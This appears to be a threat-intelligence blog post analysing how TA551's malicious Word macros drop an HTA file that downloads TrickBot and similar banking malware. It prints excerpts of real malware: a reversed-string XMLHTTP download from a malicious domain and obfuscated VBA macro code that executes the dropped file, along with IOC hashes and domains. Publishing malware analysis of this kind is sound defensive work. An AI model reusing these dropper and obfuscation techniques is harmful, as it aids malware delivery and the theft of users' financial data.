Continuously Changing Malicious Word Macro Being Distributed – Trend of TA551

The ASEC analysis team has been continuously updating the blog with information on malicious macro files and has been urging users to take caution. This post will introduce a type of word macro file distributed recently by the attack group TA551, showing changes in an average of 1 week.

For the distribution of malware, the group usually sends documents that contain malicious macros using emails. The operation method of the DOC file that downloads additional malware after dropping HTA file upon enabling macro is the same. The key aspect of the change is the types of malware that are additionally downloaded.

Figure 1. Operation method of malicious DOC macro distributed by TA551

The following is an explanation of how the malicious macro in the diagram above works.

The attacker sends an email with attachments that consist of malicious MS Word documents. Once the recipient opens the email, downloads the attached file, and runs the macro, the malicious HTA file gets dropped. A code that exists within the HTA file can download additional malware from the external URL. If the URL link is valid, the ultimate malware that the attacker intended to distribute is downloaded and starts to operate.

Figure 2. Names of DOC files, HTA, and DLL used in distributing TrickBot malware

The names of malicious DOC files used to distribute TrickBot malware this time and of dropped HTA files (same as that of DLL files) are displayed in the table shown above.

The distribution purpose of TrickBot did not change much, and the same can be said for the operation method of the macro code found in the distribution process of altered malicious macro files continuously used by the TA551 group. It used to be IcedId malware that TA551 steadily distributed since last year, however, the end malware to be downloaded is slightly varying, which is a notable change.

Figure 3. Behaviors that are shown when enabling DOC macro (AhnLab RAPIT)

[document.xml] – excerpt

eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts

[Macro Code] – excerpt

Attribute VB_Name = "listboxArray"
Function templateCCurr(removeDocClass)
Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
Function initTitle(arr As Variant)
Dim out As String
out = ""
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 100)
Next
initTitle = out
End Function
Attribute VB_Name = "captionO"
Function lnkObject(queryArray)
Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
Function indexDocTmp(arr As Variant)
Dim out As String
out = vbNullChar
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 101)
Next
indexDocTmp = out
End Function

Taking a look into the macro code for each version that shows changes, we can see the pattern of utilizing the internal data of the initially obfuscated document.xml object and creating hta that is obfuscated for the second time. A simple sample shows that it can slightly change the process of combining commands that execute the hta file. In certain types, they may use the data within document.xml that simply reverses the text order as shown above.

Figure 4. Malicious DOC macro file

Figure 5. Part of dropped HTA file after macro is run

Figure 6. Result of unobfuscating part of HTA data

Recently distributed sample shows that when you enable macro in the word file that includes malicious macro as shown in Figure 2, the HTA file from Figure 3 is dropped to the C:\ProgramData path. Unobfuscating a part of the code within the HTA file reveals the following code that downloads additional malware (vbaQueryCount.jpg) from the external malicious URL and saves it in the C:\Users\Public path. The jpg file downloaded is not an image file, but the DLL malware executed with regsvr32.exe.

Figure 7. TrickBot malware downloaded after disguising itself as an image file with jpg extension

Figure 8. Ultimate dll file operated by TrickBot (AhnLab RAPIT)

TrickBot is a malware that is ultimately downloaded, and it attempts malicious behaviors of stealing sensitive information such as that of web browser and financial transaction from the user PC. As shown in Figure 8 (process tree provided by AhnLab RAPIT, malware auto-analysis infrastructure), the malware collects the information of the infected PC using normal processes such as ipconfig.exe, net.exe, nltest.exe, etc.

Recent trend in changes shows that the malware that ultimately runs has changed to financial info-stealing malware.

  • IcedID download type
  • Ursnif download type
  • Trickbot download type

Users should refrain from opening emails from unknown sources, and should not run or enable macro when downloading attachment files. If the security level of the document program is set to low, macro may run automatically without any notification. Therefore, users should maintain the security level high to prevent any unintended features from being run.

Also, users are advised to update the anti-malware engine pattern to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.

[File Detection]
Downloader/DOC.TA551
Downloader/DOC.TA551.S1535
Downloader/DOC.Agent
Downloader/DOC.Generic
Dropper/MSOffice.Generic
Downloader/HTA.TA551
Downloader/Script.Agent
Trojan/JS.TrickBot
Trojan/Win.Generic.C4531900

[IOC]
47e580efca5c42565af7b214bd601d80
24d2245c3657caba1e3a3bbe14e0cc25
35ff8c7a28c72c64e0f5f9fc75e9a4aa
8333d57a044a01797f6e120b4c1b1dc2
97b1bb23455fb9a9607f37df266459fc
ebda58ce60415f80968457e8548b9fec
b736f5dc071bb3d2bb3f4f9e2e0155d1
86ddb37be7e54511c8761308c1d7fa91
2478032eded8e67228c05e8e1fdc7a89
hxxp://championriced[.]com
hxxp://app.bighomegl[.]at

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments